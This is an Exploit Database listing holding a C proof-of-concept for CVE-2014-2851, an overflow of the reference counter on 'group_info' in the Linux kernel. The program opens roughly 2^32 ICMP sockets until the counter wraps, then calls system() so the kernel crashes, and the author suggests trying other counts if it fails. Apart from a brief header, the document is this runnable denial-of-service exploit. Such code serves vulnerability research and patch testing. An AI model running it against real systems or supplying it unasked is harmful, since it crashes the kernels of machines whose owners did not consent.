Linux Kernel - 'group_info' refcounter Overflow Memory Corruption

EDB-ID:

32926




Platform:

Linux

Date:

2014-04-18


/*
 * DoS poc for CVE-2014-2851
 * Linux group_info refcounter overflow memory corruption
 *
 * https://lkml.org/lkml/2014/4/10/736
 *
 * @Tohmaxx - http://thomaspollet.blogspot.be
 *
 * If the app doesn't crash your system, try a different count (argv[1])
 * Execution takes a while because 2^32 socket() calls
 *
 */

#include <arpa/inet.h>
#include <stdio.h>
#include <sys/socket.h>
int main(int argc, char *argv[]) {
    int i ;
    struct sockaddr_in saddr;
    unsigned count = (1UL<<32) - 20 ;
    if(argc >= 2){
        // Specify count
        count = atoi(argv[1]);
    }
    printf("count 0x%x\n",count);
    for(i = 0 ; (unsigned)i < count;i++ ){
        socket(AF_INET, SOCK_DGRAM, IPPROTO_ICMP);
        if ( i % ( 1 << 22 ) == 0 )
            printf("%i \n",i);
    }
    //Now make it wrap and crash:
    system("/bin/echo bye bye");
}